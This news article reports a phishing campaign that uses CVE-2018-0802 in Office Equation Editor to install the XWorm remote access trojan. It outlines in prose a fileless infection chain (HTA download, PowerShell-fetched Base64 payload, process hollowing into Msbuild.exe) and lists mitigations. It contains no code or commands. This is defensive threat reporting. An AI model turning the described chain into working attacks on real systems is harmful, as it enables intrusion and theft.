Phishing campaign spreads XWorm trojan using legacy Office flaw

Attackers are exploiting an older Microsoft Office vulnerability to deliver full remote control malware to enterprise systems.

What happened

A cyber espionage campaign is spreading the remote access trojan XWorm through business themed phishing emails that exploit CVE-2018-0802, a remote code execution flaw in Microsoft Equation Editor. According to CyberPress, the emails impersonate purchase orders, shipment notices, and payment confirmations and encourage recipients to open a malicious Excel add in. The file contains a hidden Object Linking and Embedding (OLE) component, a Windows feature used to embed content between documents, which triggers the vulnerable legacy Equation Editor when opened. The exploit runs hidden code that downloads an HTML Application file and launches a multi stage infection process that installs XWorm version 7.2, giving attackers full remote control of infected Windows systems.

Going deeper

The infection chain uses “fileless” techniques designed to avoid leaving detectable files on a system. After exploitation, malicious code retrieves and runs an HTA file, a type of Windows script application, using built in system tools. The script then launches PowerShell to download what appears to be an image file, however it actually contains a Base64 encoded .NET malware component, meaning the malicious code is hidden inside encoded data. Rather than saving the malware to the hard drive, it loads directly into memory to bypass traditional antivirus detection. The final payload, XWorm, is injected into a legitimate Msbuild.exe process using a technique known as process hollowing, where attackers replace the memory of a trusted program with malicious code while keeping its legitimate name. Once running, XWorm connects to an attacker-controlled command server, encrypts communications using AES encryption, and registers the infected device for remote control.

What was said

Researchers cited in a February 16, 2026 CyberPress report warned that outdated software components continue to expose organizations to avoidable risk. Security experts stated, “Security experts recommend turning off legacy Office components, applying patches, and treating unexpected attachments with caution. Even a single open document can give attackers complete control of a system within minutes,” referring to exploitation of the vulnerability tracked as CVE-2018-0802.

In the know

According to Microsoft, XWorm is a remote access trojan distributed through a malware as a service model and linked to the ClickFix campaign. The malware spreads primarily through phishing emails containing malicious links or attachments and allows attackers to steal sensitive information, hijack MetaMask cryptocurrency wallets and Telegram sessions, and monitor activity on infected Windows devices. Once installed, XWorm establishes persistence through startup system entries, hides its components using obfuscation techniques to avoid detection, and communicates with attacker controlled command and control servers to receive instructions and transmit stolen data.

The big picture

Exploitation of CVE-2018-0802 is not new, yet federal authorities continue to classify it as an actively exploited vulnerability. The Cybersecurity and Infrastructure Security Agency maintains CVE-2018-0802 in its Known Exploited Vulnerabilities Catalog, identifying it as a flaw that threat actors continue to weaponize in real-world intrusions. Continued abuse of this Equation Editor vulnerability proves how legacy software components remain embedded in enterprise environments long after patches are available.

FAQs

Why is CVE-2018-0802 still effective years after disclosure?

Many systems retain outdated Equation Editor components that were not fully removed or patched, allowing attackers to exploit the vulnerability even in otherwise modern environments.

What is process hollowing?

Process hollowing is a technique where malicious code replaces the memory of a legitimate running process, allowing malware to execute under a trusted process name.

What makes XWorm particularly dangerous?

XWorm provides full remote access, supports encrypted command-and-control communications, and includes a plugin architecture that can extend functionality to credential theft, surveillance, ransomware deployment, and distributed denial-of-service activity.

Why are phishing attachments still effective in enterprise environments?

Business-themed emails that resemble routine operational documents can bypass user suspicion, especially when combined with exploits that trigger automatically upon opening.

What mitigation steps reduce exposure to legacy Office exploits?

Organizations can remove outdated Office components, ensure timely patch management, disable unnecessary OLE functionality, restrict execution of HTA files, and monitor for suspicious PowerShell and process injection behavior.